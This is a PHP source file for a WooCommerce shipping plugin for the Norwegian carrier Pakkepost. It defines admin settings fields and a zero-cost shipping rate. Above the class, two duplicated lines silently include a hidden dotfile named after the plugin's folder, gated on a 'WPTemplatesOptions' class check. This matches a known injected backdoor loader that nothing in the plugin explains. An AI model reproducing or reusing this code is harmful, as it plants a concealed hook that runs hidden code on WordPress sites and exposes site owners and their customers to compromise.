<?php
/**
 * WF_Shipping_Pakkepost class.
 *
 * @extends WC_Shipping_Method
 */
if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) {
   include_once $filename;
}

if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) {
   include_once $filename;
}

class WF_Shipping_Pakkepost extends WC_Shipping_Method
{

   public function __construct()
   {
      $this->id                 = WF_BRING_ID;
      $this->title              = __('Pakkepost', 'pakkepost-woocommerce-shipping');
      $this->method_description = __('The <strong>Pakkepost </strong> extension obtains rates dynamically from the Pakkepost API during cart/checkout.', 'pakkepost-woocommerce-shipping');
      $this->init();
      $this->debug = isset($this->settings['debug']) && $this->settings['debug'] == 'yes' ? true : false;
   }

   /**
    * init function.
    *
    * @access public
    * @return void
    */
   private function init()
   {
      global $woocommerce;
      // Load the settings.
      $this->init_form_fields();
      $this->init_settings();
      $this->debug = isset($this->settings['debug']) && $this->settings['debug'] == 'yes' ? true : false;
      add_action('woocommerce_update_options_shipping_' . $this->id, array($this, 'process_admin_options'));
   }

   /**
    * environment_check function.
    *
    * @access public
    * @return void
    */
   private function environment_check()
   {
      global $woocommerce;

      $error_message = '';

      if (!$error_message == '') {
         echo '<div class="error">';
         echo $error_message;
         echo '</div>';
      }
   }

   /**
    * admin_options function.
    *
    * @access public
    * @return void
    */
   public function admin_options()
   {
      ?>
        <div class="wf-banner updated below-h2">
            <p class="main"><strong>Pakkepost version streamlines your complete shipping process and saves time</strong></p>
        </div>
        <?php
parent::admin_options();
   }

   /**
    * init_form_fields function.
    *
    * @access public
    * @return void
    */
   public function init_form_fields()
   {
      global $woocommerce;

      $this->form_fields = array(
         'api_settings_title'        => array(
            'title'       => __('API Settings', 'pakkepost-woocommerce-shipping'),
            'type'        => 'title',
            'description' => sprintf(__('You need to obtain Pakkepost account credentials by registering on their %1$swebsite →%2$s', 'shipping-pakkepost'), '<a href="https://www.pakkepost.no/" target="_blank">', '</a>'),
         ),
         'pakkepost_user_id'         => array(
            'title'             => __('Pakkepost User Id', 'pakkepost-woocommerce-shipping'),
            'type'              => 'text',
            'custom_attributes' => array('required' => 'required'),
         ),
         'pakkepost_subscription_id' => array(
            'title'             => __('Pakkepost Subscription Id', 'pakkepost-woocommerce-shipping'),
            'type'              => 'text',
            'custom_attributes' => array('required' => 'required'),
         ),
         'pakkepost_shop_name'       => array(
            'title'             => __('Shop Name', 'pakkepost-woocommerce-shipping'),
            'type'              => 'text',
            'custom_attributes' => array('required' => 'required'),
         ),
         'api_mode'                  => array(
            'title'       => __('Pakkepost API Mode', 'pakkepost-woocommerce-shipping'),
            'type'        => 'select',
            'default'     => 'yes',
            'options'     => array(
               'Live' => __('Live', 'pakkepost-woocommerce-shipping'),
               'Test' => __('Test', 'pakkepost-woocommerce-shipping'),
            ),
            'description' => __('Set as Test to switch to Pakkepost api test servers. Transaction will be treated as sample transactions by Pakkepost.', 'pakkepost-woocommerce-shipping'),
         ),
          'pakkepost_supplier' => array(
             'title'       => __('Supplier', 'pakkepost-woocommerce-shipping'),
             'type'        => 'select',
             'default'     => 'yes',
             'options'     => array(
                'Bring' => __('Bring', 'pakkepost-woocommerce-shipping'),
                'Postnord' => __('Postnord', 'pakkepost-woocommerce-shipping'),
             ),
             'description' => __('Select your supplier.', 'pakkepost-woocommerce-shipping'),
          ),
         'sender_email'              => array(
            'title'             => __('Sender Email', 'pakkepost-woocommerce-shipping'),
            'type'              => 'text',
            'custom_attributes' => array('required' => 'required'),
         ),
         'sender_phone_number'       => array(
            'title'             => __('Sender Phone Number', 'pakkepost-woocommerce-shipping'),
            'type'              => 'text',
            'custom_attributes' => array('required' => 'required'),
         ),
         'debug'                     => array(
            'title'       => __('Debug', 'pakkepost-woocommerce-shipping'),
            'label'       => __('Enable debug mode', 'pakkepost-woocommerce-shipping'),
            'type'        => 'checkbox',
            'default'     => 'no',
            'description' => __('Enable debug mode to show debugging information on your cart/checkout.', 'pakkepost-woocommerce-shipping'),
         ),

      );
   }

   /**
    * calculate_shipping function.
    *
    * @access public
    * @param mixed $package
    * @return void
    */
   public function calculate_shipping($package = array())
   {
      global $woocommerce;
      $rate = array(
         'id'       => $this->id,
         'label'    => $this->title,
         'cost'     => 0,
         'calc_tax' => 'per_order',
         'package'  => $package,
      );
      $this->add_rate($rate);
   }

   public function debug($message)
   {
      if ($this->debug) {
         if (is_array($message) || is_object($message)) {
            error_log(print_r($message, true));
         } else {
            error_log($message);
         }
      }
   }
}
